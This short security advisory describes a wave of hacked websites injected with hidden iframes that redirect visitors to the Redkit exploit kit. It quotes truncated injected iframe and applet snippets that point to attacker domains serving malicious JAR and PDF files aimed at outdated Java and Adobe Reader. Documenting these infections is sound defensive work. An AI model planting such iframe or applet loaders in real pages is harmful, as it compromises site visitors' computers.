A New batch of compromised sites are being infected with hidden iframes leading to the Redkit exploit kit. A site gets hacked and an iframe similar to this one is added::
<iframe src="http://ad-d-to.com.br.ms:81/rem2.html..Once that is loaded into the browser, it redirects anyone visiting the site to:
http://orcasp.com.br/43745180.htmlWhere it tries to make the browser load some malicious PDFs or Jar files:
<appletĀ archive="http://orcasp.com.br/33256.jar"..
<iframeĀ src="http://orcasp.com.br/98765.pdf"..And if you are running an outdated version of Java or Adobe PDF, your personal computer would get compromised as well.